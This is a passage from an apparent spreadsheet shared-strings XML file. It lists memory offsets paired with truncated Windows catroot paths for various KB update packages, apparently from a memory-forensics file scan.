    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_326_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf67ebe0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf67ef18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_325_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf67f028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3003743~31bf</t>
  </si>
  <si>
    <t>0xdf67f3a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf67f4e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_33_for_KB2871997~31bf</t>
  </si>
  <si>
    <t>0xdf67f820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3061518~31bf</t>
  </si>
  <si>
    <t>0xdf67f9f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3031432~31bf</t>
  </si>
  <si>
    <t>0xdf67fd10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3011780~31bf</t>
  </si>
  <si>
    <t>0xdf680028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_32_for_KB3124275~31bf</t>
  </si>
  <si>
    <t>0xdf680368</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_340_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6804a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_346_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf680680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_33_for_KB3080079~31bf</t>
  </si>
  <si>
    <t>0xdf680998</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_33_for_KB3042058~31bf</t>
  </si>
  <si>
    <t>0xdf680d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_338_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf680eb8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_342_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf681028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_341_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6811a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_351_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf681378</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_347_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6816b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_345_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6819c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_344_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf681ce0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_343_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf682028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_348_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf682300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_353_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf682618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_352_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf682820</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_355_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6829f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_350_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf682d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_349_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf683148</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_361_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf683320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_359_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf683638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_358_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf683950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_357_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf683a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_35_for_KB2984972~31bf</t>
  </si>
  <si>
    <t>0xdf683c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_356_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf683f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_354_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf684300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_363_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf684440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_366_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf684778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_362_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf684950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_361_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf684c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_360_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf684f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_35_for_KB2992611~31bf</t>
  </si>
  <si>
    <t>0xdf685278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_369_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6853b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_370_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf685590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_368_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6858a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_367_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf685c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_365_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf685f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_364_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6862f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_37_for_KB3138612~31bf</t>
  </si>
  <si>
    <t>0xdf686608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_37_for_KB2758857~31bf</t>
  </si>
  <si>
    <t>0xdf686920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_37_for_KB2731771~31bf</t>
  </si>
  <si>
    <t>0xdf686a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_37_for_KB2843630~31bf</t>
  </si>
  <si>
    <t>x86~~6.1.3.</t>
  </si>
  <si>
    <t>0xdf686c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_371_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf686ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_36_for_KB2732059~31bf</t>
  </si>
  <si>
    <t>x86~~6.1.5.</t>
  </si>
  <si>
    <t>0xdf687278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2813347~31bf</t>
  </si>
  <si>
    <t>0xdf6873b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2984976~31bf</t>
  </si>
  <si>
    <t>0xdf687590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2773072~31bf</t>
  </si>
  <si>
    <t>0xdf687950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2731771~31bf</t>
  </si>
  <si>
    <t>0xdf687c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2726535~31bf</t>
  </si>
  <si>
    <t>0xdf687da8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2758857~31bf</t>
  </si>
  <si>
    <t>0xdf687f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_37_for_KB4483187~31bf</t>
  </si>
  <si>
    <t>x86~~11.2.1</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[140G</t>
  </si>
  <si>
    <t>0xdf6882f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf688430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2731771~31bf</t>
  </si>
  <si>
    <t>0xdf688608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf688920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf688a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB3075220~31bf</t>
  </si>
  <si>
    <t>0xdf688c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf688ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB2843630~31bf</t>
  </si>
  <si>
    <t>0xdf689288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2773072~31bf</t>
  </si>
  <si>
    <t>0xdf6893c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2813430~31bf</t>
  </si>
  <si>
    <t>0xdf6895a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2758857~31bf</t>
  </si>
  <si>
    <t>0xdf6898b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2726535~31bf</t>
  </si>
  <si>
    <t>0xdf689bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB4483187~31bf</t>
  </si>
  <si>
    <t>0xdf689ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_38_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf68a248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf68a388</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3075220~31bf</t>
  </si>
  <si>
    <t>0xdf68a560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf68a878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf68ac38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2813347~31bf</t>
  </si>
  <si>
    <t>0xdf68aee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB2808679~31bf</t>
  </si>
  <si>
    <t>0xdf68b288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2491683~31bf3</t>
  </si>
  <si>
    <t>0xdf68b5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3159398~31bf</t>
  </si>
  <si>
    <t>0xdf68b8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3102429~31bf</t>
  </si>
  <si>
    <t>0xdf68b9f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB4483187~31bf</t>
  </si>
  <si>
    <t>0xdf68bbd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf68bee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_39_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf68c248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2547666~31bf3</t>
  </si>
  <si>
    <t>0xdf68c388</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2598845~31bf3</t>
  </si>
  <si>
    <t>0xdf68c560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2533623~31bf3</t>
  </si>
  <si>
    <t>0xdf68c920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2515325~31bf3</t>
  </si>
  <si>
    <t>0xdf68cc38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2510531~31bf3</t>
  </si>
  <si>
    <t>0xdf68cd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2532531~31bf3</t>
  </si>
  <si>
    <t>0xdf68cee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2506928~31bf3</t>
  </si>
  <si>
    <t>0xdf68d288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2685811~31bf3</t>
  </si>
  <si>
    <t>0xdf68d5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2667402~31bf3</t>
  </si>
  <si>
    <t>0xdf68d6e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2742599~31bf3</t>
  </si>
  <si>
    <t>0xdf68d8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2660075~31bf3</t>
  </si>
  <si>
    <t>0xdf68dbd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2620704~31bf3</t>
  </si>
  <si>
    <t>0xdf68dd10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2698365~31bf3</t>
  </si>
  <si>
    <t>0xdf68dee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2560656~31bf3</t>
  </si>
  <si>
    <t>0xdf68e160</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2770660~31bf3</t>
  </si>
  <si>
    <t>0xdf68e478</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2732487~31bf3</t>
  </si>
  <si>
    <t>0xdf68e790</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2727528~31bf3</t>
  </si>
  <si>
    <t>0xdf68eaa8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2719857~31bf3</t>
  </si>
  <si>
    <t>0xdf68ecb0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2789645~31bf3</t>
  </si>
  <si>
    <t>0xdf68edf0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2847927~31bf3</t>
  </si>
  <si>
    <t>0xdf68f1e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2908783~31bf3</t>
  </si>
  <si>
    <t>0xdf68f4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2862335~31bf3</t>
  </si>
  <si>
    <t>0xdf68f638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2919469~31bf3</t>
  </si>
  <si>
    <t>0xdf68f810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2852386~31bf3</t>
  </si>
  <si>
    <t>0xdf68fbd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2836943~31bf3</t>
  </si>
  <si>
    <t>0xdf68fee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2807986~31bf3</t>
  </si>
  <si>
    <t>0xdf690118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2978120~31bf3</t>
  </si>
  <si>
    <t>0xdf6904f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2972211~31bf3</t>
  </si>
  <si>
    <t>0xdf690638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3037574~31bf3</t>
  </si>
  <si>
    <t>0xdf690810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2972100~31bf3</t>
  </si>
  <si>
    <t>0xdf690b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2952664~31bf3</t>
  </si>
  <si>
    <t>0xdf690c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB2973201~31bf3</t>
  </si>
  <si>
    <t>0xdf690e40</t>
  </si>
  <si>
    <t>0xdf6911b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3078601~31bf3</t>
  </si>
  <si>
    <t>0xdf6914c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3046017~31bf3</t>
  </si>
  <si>
    <t>0xdf691810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3035132~31bf3</t>
  </si>
  <si>
    <t>0xdf691b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3035126~31bf3</t>
  </si>
  <si>
    <t>0xdf691c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3156016~31bf3</t>
  </si>
  <si>
    <t>0xdf691e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3006137~31bf3</t>
  </si>
  <si>
    <t>0xdf692258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB982018~31bf38</t>
  </si>
  <si>
    <t>0xdf692430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB4483458~31bf3</t>
  </si>
  <si>
    <t>0xdf692748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB4040980~31bf3</t>
  </si>
  <si>
    <t>0xdf692a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3156019~31bf3</t>
  </si>
  <si>
    <t>0xdf692ba0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB4486563~31bf3</t>
  </si>
  <si>
    <t>0xdf692d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_3_for_KB3110329~31bf3</t>
  </si>
  <si>
    <t>0xdf6933c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3004375~31bf</t>
  </si>
  <si>
    <t>0xdf6937a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB2813430~31bf</t>
  </si>
  <si>
    <t>0xdf6938e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3080149~31bf</t>
  </si>
  <si>
    <t>0xdf693ac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB2726535~31bf</t>
  </si>
  <si>
    <t>0xdf693dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_409_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf693f18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB2893519~31bf</t>
  </si>
  <si>
    <t>0xdf694028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3060716~31bf</t>
  </si>
  <si>
    <t>0xdf6940e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3184143~31bf</t>
  </si>
  <si>
    <t>0xdf694400</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3159398~31bf</t>
  </si>
  <si>
    <t>0xdf694718</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3102429~31bf</t>
  </si>
  <si>
    <t>0xdf694a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3071756~31bf</t>
  </si>
  <si>
    <t>0xdf694d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB3068708~31bf</t>
  </si>
  <si>
    <t>0xdf694eb8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_40_for_KB4483187~31bf</t>
  </si>
  <si>
    <t>0xdf695298</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_419_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf695470</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_414_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf695788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_413_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf695aa0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_412_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf695be0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_415_for_KB4486563~31b</t>
  </si>
